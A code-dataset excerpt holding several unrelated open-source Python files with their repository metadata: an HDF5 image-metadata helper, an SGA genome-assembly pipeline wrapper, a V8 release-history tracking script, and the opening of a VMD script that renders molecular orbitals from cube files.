image_filepath = os.path.join(path, filename)
title = 'Histogram for resized and rescaled preview data: %s' \
% image_filepath
name = image_filepath.replace('/', '|')
logger.debug('name: %s' % name)
logger.debug('title: %s' % title)
logger.debug('histogram: %s, %s' % (histogram.dtype,
str(histogram.shape)))
try:
histogram_ent = histogram_group.__getattr__(name)
histogram_ent[:] = histogram
except tables.exceptions.NoSuchNodeError:
histogram_ent = metafile['tables'
].create_array(histogram_group, name,
obj=histogram, title=title)
logger.debug('histogram_ent: %s, %s, %s'
% (histogram_ent.dtype, histogram_ent.shape,
histogram_ent))
result = True
__close_image_settings_file(logger, metafile)
return result
def get_image_file_preview_histogram(
logger,
base_path,
path,
filename,
):
"""Returns ndarray copy of preview file histogram"""
metafile = __open_image_settings_file(logger, base_path)
result = to_ndarray(logger,
__get_image_file_preview_histogram_data(logger,
metafile, path, filename))
__close_image_settings_file(logger, metafile)
return result
|
heromod/migrid
|
mig/shared/imagemetaio.py
|
Python
|
gpl-2.0
| 42,918
|
[
"Brian"
] |
aa9c031aa6961d1eb472f91d27738e2291c12dcffe0c19947a1ea46bc2b1d964
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import re
import subprocess
def is_empty(fpath):
try:
return not (os.path.getsize(fpath) > 0)
except OSError:
pass
return True
if __name__ == '__main__':
# Arguments parsing
parser = argparse.ArgumentParser(description='')
# -i / --input_fastq
parser.add_argument('-i', '--input_fastq',
action='store',
metavar='FASTQ',
type=str,
required=True,
help='Input fastq file')
# --paired_end
parser.add_argument('--paired_end',
action='store_true',
help='Input fastq is made of '
'interleaved paired-end reads')
# -o / --output_contigs
parser.add_argument('-o', '--output_contigs',
action='store',
metavar='FASTA',
type=str,
default='contigs.fa',
                        help='Output contigs fasta file. '
                             'Default is %(default)s')
# --no_correction
parser.add_argument('--no_correction',
                        action='store_true',
                        help='Deactivate error correction')
# --sga_bin
parser.add_argument('--sga_bin',
action='store',
metavar='PATH',
type=str,
default='sga',
help='SGA bin path (by default sga is searched in $PATH)')
# --tmp_dir
parser.add_argument('--tmp_dir',
action='store',
metavar='DIR',
type=str,
default='/tmp',
                        help='Tmp directory. '
                             'Default is %(default)s')
# --cpu
parser.add_argument('--cpu',
action='store',
metavar='INT',
type=int,
default=3,
                        help='Max number of CPU to use. '
                             'Default is %(default)s')
#
args = parser.parse_args()
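    # Example invocation (a sketch):
    #   ./sga_assemble.py -i reads.fq -o contigs.fa --cpu 4 --tmp_dir /tmp/sga_work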
assembly_output_basename = 'assemble'
# Get input and output files absolute paths
input_filepath = os.path.realpath(args.input_fastq)
current_working_dir = os.getcwd()
if (args.output_contigs[0] == '/' or args.output_contigs[0] == '~'):
# output file was given using an absolute path
output_filepath = args.output_contigs
else:
# output file was given using a relative path
output_filepath = current_working_dir + '/' + args.output_contigs
# Mkdir tmp dir if need be
try:
if not os.path.exists(args.tmp_dir):
os.makedirs(args.tmp_dir)
except OSError:
sys.stderr.write("\nERROR: {0} tmp dir cannot be created\n\n".format(args.tmp_dir))
raise
# Change cwd to tmp dir
os.chdir(args.tmp_dir)
# Cleaning last assembly contigs
if os.path.exists(assembly_output_basename + '-contigs.fa'):
os.remove(assembly_output_basename + '-contigs.fa')
# Preprocessing
preprocess_output = 'preprocess_output.fq'
cmd_line = args.sga_bin + ' preprocess -v ' + input_filepath
cmd_line += ' -o ' + preprocess_output
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
if is_empty(preprocess_output):
        sys.stdout.write('\nWARNING: sga preprocess returned an empty file\n')
exit(0)
## Error correction
error_corrected_output_basename = 'preprocess_output'
if not args.no_correction:
error_corrected_output_basename = 'error_corrected'
# Build the index that will be used for error correction
cmd_line = args.sga_bin + ' index -a sais' # ropebwt algo will only work for sequences < 200bp
cmd_line += ' -t ' + str(args.cpu) + ' --no-reverse '
cmd_line += preprocess_output
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Perform error correction
kmer_cutoff = 41
cmd_line = args.sga_bin + ' correct -k ' + str(kmer_cutoff)
cmd_line += ' --discard -x 2 -t ' + str(args.cpu)
#~ cmd_line += ' --discard --learn -t ' + str(args.cpu)
cmd_line += ' -o ' + error_corrected_output_basename + '.fq'
cmd_line += ' ' + preprocess_output
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
    if is_empty(error_corrected_output_basename + '.fq'):
        sys.stdout.write('\nWARNING: sga correct returned an empty file\n')
        exit(0)
## Contig assembly
# Index the corrected data
cmd_line = args.sga_bin + ' index -a sais' # ropebwt algo will only work for sequences < 200bp
cmd_line += ' -t ' + str(args.cpu)
cmd_line += ' ' + error_corrected_output_basename + '.fq'
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Remove exact-match duplicates and reads with low-frequency k-mers
filtered_output = error_corrected_output_basename + '.filter.pass.fa'
min_kmer_coverage = 2
if args.no_correction:
min_kmer_coverage = 1
cmd_line = args.sga_bin + ' filter -x ' + str(min_kmer_coverage)
cmd_line += ' -t ' + str(args.cpu)
if not args.no_correction:
cmd_line += ' --homopolymer-check --low-complexity-check'
cmd_line += ' -o ' + filtered_output
cmd_line += ' ' + error_corrected_output_basename + '.fq'
sys.stdout.write('\nCMD: {0}\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
if is_empty(filtered_output):
        sys.stdout.write('\nWARNING: sga filter returned an empty file\n')
exit(0)
# Merge simple, unbranched chains of vertices
fm_merge_overlap = 55
merged_output_basename = 'merged_output'
cmd_line = args.sga_bin + ' fm-merge -m ' + str(fm_merge_overlap)
cmd_line += ' -t ' + str(args.cpu) + ' -o ' + merged_output_basename + '.fa'
cmd_line += ' ' + filtered_output
sys.stdout.write('\nCMD: {0}\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
if is_empty(merged_output_basename + '.fa'):
        sys.stdout.write('\nWARNING: sga fm-merge returned an empty file\n')
exit(0)
# Build an index of the merged sequences
cmd_line = args.sga_bin + ' index -d 1000000'
cmd_line += ' -t ' + str(args.cpu)
cmd_line += ' ' + merged_output_basename + '.fa'
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Remove any substrings that were generated from the merge process
cmd_line = args.sga_bin + ' rmdup'
cmd_line += ' -t ' + str(args.cpu)
cmd_line += ' ' + merged_output_basename + '.fa'
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Compute the structure of the string graph
min_overlap = fm_merge_overlap
cmd_line = args.sga_bin + ' overlap -m ' + str(min_overlap)
cmd_line += ' -t ' + str(args.cpu)
cmd_line += ' ' + merged_output_basename + '.rmdup.fa'
sys.stdout.write('\nCMD: {0}\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
# Perform the contig assembly without bubble popping
assembly_output_basename = 'assemble'
assembly_contigs_filename = assembly_output_basename + '-contigs.fa'
cmd_line = args.sga_bin + ' assemble -m ' + str(min_overlap)
#~ cmd_line += ' -b 3 -d 0.03 -g 0.01 '
cmd_line += ' -b 0'
#~ cmd_line += ' -r 10'
#~ cmd_line += ' --max-edges 10000 -x 10 -l 100 '
cmd_line += ' -x 10 -l 100 '
cmd_line += ' -o ' + assembly_output_basename
cmd_line += ' ' + merged_output_basename + '.rmdup.asqg.gz'
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
    # Scaffolding (note: unfinished; the bwa index command below is built but never executed)
assembly_scaffolds_filename = assembly_output_basename + '-scaffolds.fa'
if args.paired_end:
cmd_line = 'bwa index ' + assembly_contigs_filename
#~ cmd_line
## Final post-processing
assembly_output_filename = assembly_output_basename
if args.paired_end:
assembly_output_filename += '-scaffolds.fa'
else:
assembly_output_filename += '-contigs.fa'
#~ cmd_line = 'cp ' + assembly_output_filename + ' '
cmd_line = 'cp ' + assembly_contigs_filename + ' '
cmd_line += output_filepath
sys.stdout.write('\nCMD: {0}\n\n'.format(cmd_line))
subprocess.check_call(cmd_line, shell=True)
exit(0)
|
bonsai-team/matam
|
scripts/sga_assemble.py
|
Python
|
agpl-3.0
| 8,860
|
[
"BWA"
] |
ba83fd97ed60d6778d9e93012efb773327ca7d66201c84900abd79238e72e0e1
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This script retrieves the history of all V8 branches and trunk revisions and
# their corresponding Chromium revisions.
# Requires a chromium checkout with branch heads:
# gclient sync --with_branch_heads
# gclient fetch
import argparse
import csv
import itertools
import json
import os
import re
import sys
from common_includes import *
CONFIG = {
"BRANCHNAME": "retrieve-v8-releases",
"PERSISTFILE_BASENAME": "/tmp/v8-releases-tempfile",
}
# Expression for retrieving the bleeding edge revision from a commit message.
PUSH_MSG_SVN_RE = re.compile(r".* \(based on bleeding_edge revision r(\d+)\)$")
PUSH_MSG_GIT_RE = re.compile(r".* \(based on ([a-fA-F0-9]+)\)$")
# Expression for retrieving the merged patches from a merge commit message
# (old and new format).
MERGE_MESSAGE_RE = re.compile(r"^.*[M|m]erged (.+)(\)| into).*$", re.M)
CHERRY_PICK_TITLE_GIT_RE = re.compile(r"^.* \(cherry\-pick\)\.?$")
# New git message for cherry-picked CLs. One message per line.
MERGE_MESSAGE_GIT_RE = re.compile(r"^Merged ([a-fA-F0-9]+)\.?$")
# Expression for retrieving reverted patches from a commit message (old and
# new format).
ROLLBACK_MESSAGE_RE = re.compile(r"^.*[R|r]ollback of (.+)(\)| in).*$", re.M)
# New git message for reverted CLs. One message per line.
ROLLBACK_MESSAGE_GIT_RE = re.compile(r"^Rollback of ([a-fA-F0-9]+)\.?$")
# Expression for retrieving the code review link.
REVIEW_LINK_RE = re.compile(r"^Review URL: (.+)$", re.M)
# Expression with three versions (historical) for extracting the v8 revision
# from the chromium DEPS file.
DEPS_RE = re.compile(r"""^\s*(?:["']v8_revision["']: ["']"""
"""|\(Var\("googlecode_url"\) % "v8"\) \+ "\/trunk@"""
"""|"http\:\/\/v8\.googlecode\.com\/svn\/trunk@)"""
"""([^"']+)["'].*$""", re.M)
# Expression to pick tag and revision for bleeding edge tags. To be used with
# output of 'svn log'.
BLEEDING_EDGE_TAGS_RE = re.compile(
r"A \/tags\/([^\s]+) \(from \/branches\/bleeding_edge\:(\d+)\)")
def SortBranches(branches):
"""Sort branches with version number names."""
return sorted(branches, key=SortingKey, reverse=True)
def FilterDuplicatesAndReverse(cr_releases):
"""Returns the chromium releases in reverse order filtered by v8 revision
duplicates.
cr_releases is a list of [cr_rev, v8_rev] reverse-sorted by cr_rev.
"""
last = ""
result = []
for release in reversed(cr_releases):
if last == release[1]:
continue
last = release[1]
result.append(release)
return result
def BuildRevisionRanges(cr_releases):
"""Returns a mapping of v8 revision -> chromium ranges.
The ranges are comma-separated, each range has the form R1:R2. The newest
entry is the only one of the form R1, as there is no end range.
cr_releases is a list of [cr_rev, v8_rev] reverse-sorted by cr_rev.
cr_rev either refers to a chromium svn revision or a chromium branch number.
"""
range_lists = {}
cr_releases = FilterDuplicatesAndReverse(cr_releases)
# Visit pairs of cr releases from oldest to newest.
for cr_from, cr_to in itertools.izip(
cr_releases, itertools.islice(cr_releases, 1, None)):
# Assume the chromium revisions are all different.
assert cr_from[0] != cr_to[0]
# TODO(machenbach): Subtraction is not git friendly.
ran = "%s:%d" % (cr_from[0], int(cr_to[0]) - 1)
# Collect the ranges in lists per revision.
range_lists.setdefault(cr_from[1], []).append(ran)
# Add the newest revision.
if cr_releases:
range_lists.setdefault(cr_releases[-1][1], []).append(cr_releases[-1][0])
# Stringify and comma-separate the range lists.
return dict((rev, ", ".join(ran)) for rev, ran in range_lists.iteritems())
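# Example (a sketch, derived from the logic above):
#   BuildRevisionRanges([["300", "10"], ["200", "7"], ["100", "7"]])
#   returns {"7": "100:299", "10": "300"}; the duplicate v8 revision "7" is
#   collapsed and the newest entry keeps an open-ended range.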
def MatchSafe(match):
if match:
return match.group(1)
else:
return ""
class Preparation(Step):
MESSAGE = "Preparation."
def RunStep(self):
self.CommonPrepare()
self.PrepareBranch()
class RetrieveV8Releases(Step):
MESSAGE = "Retrieve all V8 releases."
def ExceedsMax(self, releases):
return (self._options.max_releases > 0
and len(releases) > self._options.max_releases)
def GetBleedingEdgeGitFromPush(self, title):
return MatchSafe(PUSH_MSG_GIT_RE.match(title))
def GetMergedPatches(self, body):
patches = MatchSafe(MERGE_MESSAGE_RE.search(body))
if not patches:
patches = MatchSafe(ROLLBACK_MESSAGE_RE.search(body))
if patches:
# Indicate reverted patches with a "-".
patches = "-%s" % patches
return patches
def GetMergedPatchesGit(self, body):
patches = []
for line in body.splitlines():
patch = MatchSafe(MERGE_MESSAGE_GIT_RE.match(line))
if patch:
patches.append(patch)
patch = MatchSafe(ROLLBACK_MESSAGE_GIT_RE.match(line))
if patch:
patches.append("-%s" % patch)
return ", ".join(patches)
def GetReleaseDict(
self, git_hash, bleeding_edge_rev, bleeding_edge_git, branch, version,
patches, cl_body):
revision = self.GetCommitPositionNumber(git_hash)
return {
# The cr commit position number on the branch.
"revision": revision,
# The git revision on the branch.
"revision_git": git_hash,
# The cr commit position number on master.
"bleeding_edge": bleeding_edge_rev,
# The same for git.
"bleeding_edge_git": bleeding_edge_git,
# The branch name.
"branch": branch,
# The version for displaying in the form 3.26.3 or 3.26.3.12.
"version": version,
# The date of the commit.
"date": self.GitLog(n=1, format="%ci", git_hash=git_hash),
# Merged patches if available in the form 'r1234, r2345'.
"patches_merged": patches,
# Default for easier output formatting.
"chromium_revision": "",
# Default for easier output formatting.
"chromium_branch": "",
# Link to the CL on code review. Trunk pushes are not uploaded, so this
# field will be populated below with the recent roll CL link.
"review_link": MatchSafe(REVIEW_LINK_RE.search(cl_body)),
# Link to the commit message on google code.
"revision_link": ("https://code.google.com/p/v8/source/detail?r=%s"
% revision),
}
def GetRelease(self, git_hash, branch):
self.ReadAndPersistVersion()
base_version = [self["major"], self["minor"], self["build"]]
version = ".".join(base_version)
body = self.GitLog(n=1, format="%B", git_hash=git_hash)
patches = ""
if self["patch"] != "0":
version += ".%s" % self["patch"]
if CHERRY_PICK_TITLE_GIT_RE.match(body.splitlines()[0]):
patches = self.GetMergedPatchesGit(body)
else:
patches = self.GetMergedPatches(body)
title = self.GitLog(n=1, format="%s", git_hash=git_hash)
bleeding_edge_git = self.GetBleedingEdgeGitFromPush(title)
bleeding_edge_position = ""
if bleeding_edge_git:
bleeding_edge_position = self.GetCommitPositionNumber(bleeding_edge_git)
# TODO(machenbach): Add the commit position number.
return self.GetReleaseDict(
git_hash, bleeding_edge_position, bleeding_edge_git, branch, version,
patches, body), self["patch"]
def GetReleasesFromMaster(self):
# TODO(machenbach): Implement this in git as soon as we tag again on
# master.
# tag_text = self.SVN("log https://v8.googlecode.com/svn/tags -v
# --limit 20")
# releases = []
# for (tag, revision) in re.findall(BLEEDING_EDGE_TAGS_RE, tag_text):
# git_hash = self.vc.SvnGit(revision)
# Add bleeding edge release. It does not contain patches or a code
# review link, as tags are not uploaded.
# releases.append(self.GetReleaseDict(
# git_hash, revision, git_hash, self.vc.MasterBranch(), tag, "", ""))
return []
def GetReleasesFromBranch(self, branch):
self.GitReset(self.vc.RemoteBranch(branch))
if branch == self.vc.MasterBranch():
return self.GetReleasesFromMaster()
releases = []
try:
for git_hash in self.GitLog(format="%H").splitlines():
if VERSION_FILE not in self.GitChangedFiles(git_hash):
continue
if self.ExceedsMax(releases):
break # pragma: no cover
if not self.GitCheckoutFileSafe(VERSION_FILE, git_hash):
break # pragma: no cover
release, patch_level = self.GetRelease(git_hash, branch)
releases.append(release)
# Follow branches only until their creation point.
# TODO(machenbach): This omits patches if the version file wasn't
# manipulated correctly. Find a better way to detect the point where
# the parent of the branch head leads to the trunk branch.
if branch != self.vc.CandidateBranch() and patch_level == "0":
break
# Allow Ctrl-C interrupt.
except (KeyboardInterrupt, SystemExit): # pragma: no cover
pass
# Clean up checked-out version file.
self.GitCheckoutFileSafe(VERSION_FILE, "HEAD")
return releases
def RunStep(self):
self.GitCreateBranch(self._config["BRANCHNAME"])
branches = self.vc.GetBranches()
releases = []
if self._options.branch == 'recent':
# Get only recent development on trunk, beta and stable.
if self._options.max_releases == 0: # pragma: no cover
self._options.max_releases = 10
beta, stable = SortBranches(branches)[0:2]
releases += self.GetReleasesFromBranch(stable)
releases += self.GetReleasesFromBranch(beta)
releases += self.GetReleasesFromBranch(self.vc.CandidateBranch())
releases += self.GetReleasesFromBranch(self.vc.MasterBranch())
elif self._options.branch == 'all': # pragma: no cover
# Retrieve the full release history.
for branch in branches:
releases += self.GetReleasesFromBranch(branch)
releases += self.GetReleasesFromBranch(self.vc.CandidateBranch())
releases += self.GetReleasesFromBranch(self.vc.MasterBranch())
else: # pragma: no cover
# Retrieve history for a specified branch.
assert self._options.branch in (branches +
[self.vc.CandidateBranch(), self.vc.MasterBranch()])
releases += self.GetReleasesFromBranch(self._options.branch)
self["releases"] = sorted(releases,
key=lambda r: SortingKey(r["version"]),
reverse=True)
class SwitchChromium(Step):
MESSAGE = "Switch to Chromium checkout."
def RunStep(self):
cwd = self._options.chromium
# Check for a clean workdir.
if not self.GitIsWorkdirClean(cwd=cwd): # pragma: no cover
self.Die("Workspace is not clean. Please commit or undo your changes.")
# Assert that the DEPS file is there.
if not os.path.exists(os.path.join(cwd, "DEPS")): # pragma: no cover
self.Die("DEPS file not present.")
class UpdateChromiumCheckout(Step):
MESSAGE = "Update the checkout and create a new branch."
def RunStep(self):
cwd = self._options.chromium
self.GitCheckout("master", cwd=cwd)
self.GitPull(cwd=cwd)
self.GitCreateBranch(self.Config("BRANCHNAME"), cwd=cwd)
def ConvertToCommitNumber(step, revision):
# Simple check for git hashes.
if revision.isdigit() and len(revision) < 8:
return revision
return step.GetCommitPositionNumber(
revision, cwd=os.path.join(step._options.chromium, "v8"))
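# Example (sketch): ConvertToCommitNumber(step, "12345") returns "12345"
# unchanged, while a 40-character git hash is resolved through
# GetCommitPositionNumber against the v8 checkout inside chromium.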
class RetrieveChromiumV8Releases(Step):
MESSAGE = "Retrieve V8 releases from Chromium DEPS."
def RunStep(self):
cwd = self._options.chromium
releases = filter(
lambda r: r["branch"] in [self.vc.CandidateBranch(),
self.vc.MasterBranch()],
self["releases"])
if not releases: # pragma: no cover
print "No releases detected. Skipping chromium history."
return True
# Update v8 checkout in chromium.
self.GitFetchOrigin(cwd=os.path.join(cwd, "v8"))
oldest_v8_rev = int(releases[-1]["revision"])
cr_releases = []
try:
for git_hash in self.GitLog(
format="%H", grep="V8", cwd=cwd).splitlines():
if "DEPS" not in self.GitChangedFiles(git_hash, cwd=cwd):
continue
if not self.GitCheckoutFileSafe("DEPS", git_hash, cwd=cwd):
break # pragma: no cover
deps = FileToText(os.path.join(cwd, "DEPS"))
match = DEPS_RE.search(deps)
if match:
cr_rev = self.GetCommitPositionNumber(git_hash, cwd=cwd)
if cr_rev:
v8_rev = ConvertToCommitNumber(self, match.group(1))
cr_releases.append([cr_rev, v8_rev])
# Stop after reaching beyond the last v8 revision we want to update.
# We need a small buffer for possible revert/reland frenzies.
# TODO(machenbach): Subtraction is not git friendly.
if int(v8_rev) < oldest_v8_rev - 100:
break # pragma: no cover
# Allow Ctrl-C interrupt.
except (KeyboardInterrupt, SystemExit): # pragma: no cover
pass
# Clean up.
self.GitCheckoutFileSafe("DEPS", "HEAD", cwd=cwd)
# Add the chromium ranges to the v8 trunk and bleeding_edge releases.
all_ranges = BuildRevisionRanges(cr_releases)
releases_dict = dict((r["revision"], r) for r in releases)
for revision, ranges in all_ranges.iteritems():
releases_dict.get(revision, {})["chromium_revision"] = ranges
# TODO(machenbach): Unify common code with method above.
class RetrieveChromiumBranches(Step):
MESSAGE = "Retrieve Chromium branch information."
def RunStep(self):
cwd = self._options.chromium
trunk_releases = filter(lambda r: r["branch"] == self.vc.CandidateBranch(),
self["releases"])
if not trunk_releases: # pragma: no cover
print "No trunk releases detected. Skipping chromium history."
return True
oldest_v8_rev = int(trunk_releases[-1]["revision"])
# Filter out irrelevant branches.
branches = filter(lambda r: re.match(r"branch-heads/\d+", r),
self.GitRemotes(cwd=cwd))
# Transform into pure branch numbers.
branches = map(lambda r: int(re.match(r"branch-heads/(\d+)", r).group(1)),
branches)
branches = sorted(branches, reverse=True)
cr_branches = []
try:
for branch in branches:
if not self.GitCheckoutFileSafe("DEPS",
"branch-heads/%d" % branch,
cwd=cwd):
break # pragma: no cover
deps = FileToText(os.path.join(cwd, "DEPS"))
match = DEPS_RE.search(deps)
if match:
v8_rev = ConvertToCommitNumber(self, match.group(1))
cr_branches.append([str(branch), v8_rev])
# Stop after reaching beyond the last v8 revision we want to update.
# We need a small buffer for possible revert/reland frenzies.
# TODO(machenbach): Subtraction is not git friendly.
if int(v8_rev) < oldest_v8_rev - 100:
break # pragma: no cover
# Allow Ctrl-C interrupt.
except (KeyboardInterrupt, SystemExit): # pragma: no cover
pass
# Clean up.
self.GitCheckoutFileSafe("DEPS", "HEAD", cwd=cwd)
# Add the chromium branches to the v8 trunk releases.
all_ranges = BuildRevisionRanges(cr_branches)
trunk_dict = dict((r["revision"], r) for r in trunk_releases)
for revision, ranges in all_ranges.iteritems():
trunk_dict.get(revision, {})["chromium_branch"] = ranges
class CleanUp(Step):
MESSAGE = "Clean up."
def RunStep(self):
self.GitCheckout("master", cwd=self._options.chromium)
self.GitDeleteBranch(self.Config("BRANCHNAME"), cwd=self._options.chromium)
self.CommonCleanup()
class WriteOutput(Step):
MESSAGE = "Print output."
def Run(self):
if self._options.csv:
with open(self._options.csv, "w") as f:
writer = csv.DictWriter(f,
["version", "branch", "revision",
"chromium_revision", "patches_merged"],
restval="",
extrasaction="ignore")
for release in self["releases"]:
writer.writerow(release)
if self._options.json:
with open(self._options.json, "w") as f:
f.write(json.dumps(self["releases"]))
if not self._options.csv and not self._options.json:
print self["releases"] # pragma: no cover
class Releases(ScriptsBase):
def _PrepareOptions(self, parser):
parser.add_argument("-b", "--branch", default="recent",
help=("The branch to analyze. If 'all' is specified, "
"analyze all branches. If 'recent' (default) "
"is specified, track beta, stable and trunk."))
parser.add_argument("-c", "--chromium",
help=("The path to your Chromium src/ "
"directory to automate the V8 roll."))
parser.add_argument("--csv", help="Path to a CSV file for export.")
parser.add_argument("-m", "--max-releases", type=int, default=0,
help="The maximum number of releases to track.")
parser.add_argument("--json", help="Path to a JSON file for export.")
def _ProcessOptions(self, options): # pragma: no cover
return True
def _Config(self):
return {
"BRANCHNAME": "retrieve-v8-releases",
"PERSISTFILE_BASENAME": "/tmp/v8-releases-tempfile",
}
def _Steps(self):
return [
Preparation,
RetrieveV8Releases,
SwitchChromium,
UpdateChromiumCheckout,
RetrieveChromiumV8Releases,
      RetrieveChromiumBranches,
CleanUp,
WriteOutput,
]
if __name__ == "__main__": # pragma: no cover
sys.exit(Releases().Run())
|
mxOBS/deb-pkg_trusty_chromium-browser
|
v8/tools/push-to-trunk/releases.py
|
Python
|
bsd-3-clause
| 18,018
|
[
"VisIt"
] |
81ded2318ae66a47c768c547825f984593e8e1a5292c1fa38464a3b26219ebec
|
#!/usr/bin/env python
# MIT License
#
# Copyright (c) 2017 Francesco Evangelista
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import argparse
import sys
import re
import subprocess
import os
import datetime
from os import listdir, environ
from os.path import isfile, join
vmd_cube_help = """vmd_cube is a script to render cube files with vmd.
To generate cube files with Psi4, add the command cubeprop() at the end of your input file."""
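# Illustrative sketch only (not part of the original script): a minimal Psi4
# input that ends with cubeprop(), as the help text above suggests, might be
#
#   molecule { 0 1
#       O
#       H 1 0.96
#       H 1 0.96 2 104.5 }
#   set cubeprop_tasks ['orbitals']
#   energy('scf/cc-pvdz')
#   cubeprop()
#
# Exact option names depend on the Psi4 version.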
vmd_exe = ""
vmd_script_name = "vmd_mo_script.vmd"
vmd_template = """#
# VMD script to plot MOs from cube files
#
# Load the molecule and change the atom style
mol load cube PARAM_CUBEFILE.cube
mol modcolor 0 PARAM_CUBENUM Element
mol modstyle 0 PARAM_CUBENUM Licorice 0.110000 10.000000 10.000000
#mol modstyle 0 PARAM_CUBENUM CPK 0.400000 0.40000 30.000000 16.000000
# Define the material
material change ambient Opaque 0.310000
material change diffuse Opaque 0.720000
material change specular Opaque 0.500000
material change shininess Opaque 0.480000
material change opacity Opaque 1.000000
material change outline Opaque 0.000000
material change outlinewidth Opaque 0.000000
material change transmode Opaque 0.000000
material change specular Opaque 0.750000
material change ambient EdgyShiny 0.310000
material change diffuse EdgyShiny 0.720000
material change shininess EdgyShiny 1.0000
material change opacity EdgyShiny PARAM_OPACITY
# Customize atom colors
color Element C silver
color Element H white
# Rotate and translate the molecule
rotate x by PARAM_RX
rotate y by PARAM_RY
rotate z by PARAM_RZ
translate by PARAM_TX PARAM_TY PARAM_TZ
scale by PARAM_SCALE
# Eliminate the axis and perfect the view
axes location Off
display projection Orthographic
display depthcue off
display resize PARAM_IMAGEW PARAM_IMAGEH
color Display Background white"""
vmd_template_surface = """#
# Add the surfaces
mol color ColorID PARAM_SURF1ID
mol representation Isosurface PARAM_ISOVALUE1 0 0 0 1 1
mol selection all
mol material EdgyShiny
mol addrep PARAM_CUBENUM
mol color ColorID PARAM_SURF2ID
mol representation Isosurface PARAM_ISOVALUE2 0 0 0 1 1
mol selection all
mol material EdgyShiny
mol addrep PARAM_CUBENUM
"""
vmd_template_interactive = """#
# Disable rendering
mol off PARAM_CUBENUM
"""
vmd_template_render = """
# Render
render TachyonInternal PARAM_CUBEFILE.tga
mol delete PARAM_CUBENUM
"""
vmd_template_rotate = """
light 1 off
light 0 rot y 30.0
light 0 rot x -30.0
"""
default_path = os.getcwd()
# Default parameters
options = {"SURF1ID" : [None,"Surface1 Color Id"],
"SURF2ID" : [None,"Surface2 Color Id"],
"ISOVALUE1" : [None,"Isosurface1 Value"],
"ISOVALUE2" : [None,"Isosurface2 Value"],
"RX" : [None,"X-axis Rotation"],
"RY" : [None,"Y-axis Rotation"],
"RZ" : [None,"Z-axis Rotation"],
"TX" : [None,"X-axis Translation"],
"TY" : [None,"Y-axis Translation"],
"TZ" : [None,"Z-axis Translation"],
"OPACITY" : [None,"Opacity"],
"CUBEDIR" : [None,"Cubefile Directory"],
"SCALE" : [None,"Scaling Factor"],
"MONTAGE" : [None,"Montage"],
"LABEL_MOS" : [None,"Label MOs"],
"FONTSIZE" : [None,"Font size"],
"IMAGEW" : [None,"Image width"],
"IMAGEH" : [None,"Image height"],
"VMDPATH" : [None,"VMD Path"],
"INTERACTIVE": [None,"Interactive Mode"],
"GZIP" : [None,"Gzip Cube Files"]}
def which(program):
import os
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
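# Example (sketch): which("montage") returns the absolute path of the montage
# executable when ImageMagick is installed and on the PATH, and None otherwise;
# call_montage() below relies on exactly this behaviour.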
def multigsub(subs,str):
for k,v in subs.items():
str = re.sub(k,v,str)
return str
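# Example (sketch): multigsub({"PARAM_RX": "30.0"}, "rotate x by PARAM_RX")
# returns "rotate x by 30.0"; the VMD templates above are filled in this way.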
def find_vmd(options):
    vmdpath = environ.get('VMDPATH')
    if vmdpath:
        vmdpath = multigsub({" ": r"\ "}, vmdpath)
        options["VMDPATH"][0] = vmdpath
    else:
        print("Please set the VMDPATH environment variable to the path of VMD.")
        exit(1)
def save_setup_command(argv):
file_name = join(default_path, 'vmd_cube_command')
f = open(file_name, 'w')
    f.write('# setup command was executed ' +
            datetime.datetime.now().strftime("%d-%B-%Y %H:%M:%S") + "\n")
f.write(" ".join(argv[:])+"\n")
f.close()
def read_options(options):
parser = argparse.ArgumentParser(description=vmd_cube_help)
parser.add_argument('data', metavar='<cubefile dir>', type=str, nargs='?',default=".",
help='The directory containing the cube files.')
parser.add_argument('--color1', metavar='<integer>', type=int, nargs='?',default=3,
help='the color ID of surface 1 (integer, default = 3)')
parser.add_argument('--color2', metavar='<integer>', type=int, nargs='?',default=23,
help='the color ID of surface 2 (integer, default = 23)')
parser.add_argument('--iso', metavar='<isovalue>', type=float, nargs='?',default=0.05,
help='the isosurface value (float, default = 0.05)')
parser.add_argument('--rx', metavar='<angle>', type=float, nargs='?',default=30.0,
help='the x-axis rotation angle (float, default = 30.0)')
parser.add_argument('--ry', metavar='<angle>', type=float, nargs='?',default=40.0,
